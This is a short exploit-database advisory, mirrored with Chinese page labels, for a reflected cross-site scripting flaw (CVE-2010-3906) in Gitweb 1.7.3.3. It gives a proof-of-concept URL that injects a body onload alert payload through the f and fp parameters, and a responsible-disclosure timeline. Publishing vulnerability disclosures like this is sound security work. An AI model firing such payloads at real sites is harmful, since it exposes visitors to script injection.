gitWeb 1.7.3.3 – Cross-Site Scripting

• Exploit Database
• 11 阅读

• 作者： emgent
  日期： 2010-12-15
• 类别：

  • webapps
  平台：

  • cgi
• 来源：https://www.exploit-db.com/exploits/15744/

• >-8 Description 8-<
  Cross-site scripting (XSS) vulnerability in Gitweb 1.7.3.3 and previous versions
  allows remote attackers to inject arbitrary web script or HTML code via f and fp variables.
  
  >-8 Proof Of Concept 8-<
  http://localhost/?p=foo/bar/ph33r.git;a=blobdiff;f=[XSS];fp=[XSS]
  [XSS] => "><body onload="alert('xss')"> <a
  
  
  >-8 Credits 8-<
  Emanuele 'emgent' Gentili <e.gentili@tigersecurity.it>
  
  
  >-8 Responsible Disclosure 8-<
  
  13-12-2010	Initial contact with upstream and vendor-sec
  13-12-2010	Vendor Response and CVE-2010-3906 assignation
  15-12-2010	Public Disclosure